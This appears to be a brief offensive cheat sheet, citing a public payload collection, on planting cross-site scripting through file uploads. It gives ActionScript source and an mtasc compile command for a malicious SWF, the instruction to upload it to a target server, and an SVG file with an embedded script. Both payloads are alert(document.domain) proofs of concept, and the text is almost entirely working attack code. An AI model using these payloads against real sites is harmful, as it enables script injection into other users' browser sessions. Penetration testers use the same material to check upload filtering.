https://github.com/MMquant/PayloadsAllTheThings/tree/master/XSS%20injection

Create XSS vulnerability via SWF file upload

Payload is created with ActionScript containing JavaScript which is compiled into swf file.
This file is uploaded and when parsed by browser it executes containing javascript.

ActionScript2 code
class XSS {
static var app: XSS;
function XSS() {
var xss = "javascript:alert(\"SWF-based XSS: \"+document.
domain)";
getURL(xss, "_self");
}
static function main(mc) {
app = new XSS();
}}

Compile to swf with /root/Programs/mtasc/mtasc
mtasc -swf swfxss.swf -main -header 0:0:0 swfxss.as

Upload swfxss.swf to target server

Create XSS vulnerability via SVG file upload

SVG is XML file

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
<script type="text/javascript">
alert(document.domain);
</script>
</svg>